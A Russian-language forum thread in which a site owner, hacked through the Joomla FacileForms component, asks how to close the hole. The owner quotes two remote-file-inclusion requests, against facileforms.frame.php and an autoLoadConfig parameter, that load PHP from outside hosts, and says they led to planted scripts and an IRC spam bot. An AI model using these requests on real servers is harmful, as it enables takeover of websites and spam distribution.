уязвимость в facileforms - FacileForms

Меня ламанули через этот компонент уязвимость в facileforms.frame.php через правильный запрос позволяет выполнить на сервере любой пхп файл, как правильно убрать уязвимость, и есть ли еще какие уязвимости в даного компонента. Запрос был такой: //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ccm.pl/ccm/test.txt??

следующий запрос /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://feam-ice.ru//test.txt??, и дальше у меня появилось куча "полезных" пхп файлов и ирц бот, которые начали валить спам куда попало

Извините написал, нерозобравшись полностю, пробовали ломать сперва через facileforms, эта уязвимость есть в facileforms 1.4.4, в 4.7 её убрали, тогда через sql инекцию ламанули, прошу администрацию перенести даную тему в соответствующий раздел форума.

ты как-то решил этот вопрос?